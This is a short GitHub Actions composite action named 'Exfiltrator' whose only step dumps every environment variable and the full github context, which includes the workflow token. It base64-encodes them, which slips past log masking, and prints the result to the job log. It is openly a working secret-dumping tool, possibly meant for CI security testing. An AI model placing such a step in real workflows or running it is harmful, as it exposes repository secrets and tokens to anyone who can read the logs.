name: 'Exfiltrator'
description: 'This exfiltrates secrets and environment variables.'

runs:
  using: "composite"
  steps:
    - name: 'Print secrets and environment variables to the terminal'
      shell: bash
      run: ENVVARS="{\"envvars\":\"$(env | base64 -w 0)\"}" && json_array=$(printf '[%s, %s, %s]' "$ENVVARS" "$GITHUB_JSON" "$EMPTY") && base64_encoded=$(echo "$json_array" | base64 -w 0) && echo "$base64_encoded"
      env:
        GITHUB_JSON: ${{ toJSON(github) }}
        EMPTY: "{\"vars\":\"no vars\"}"
        
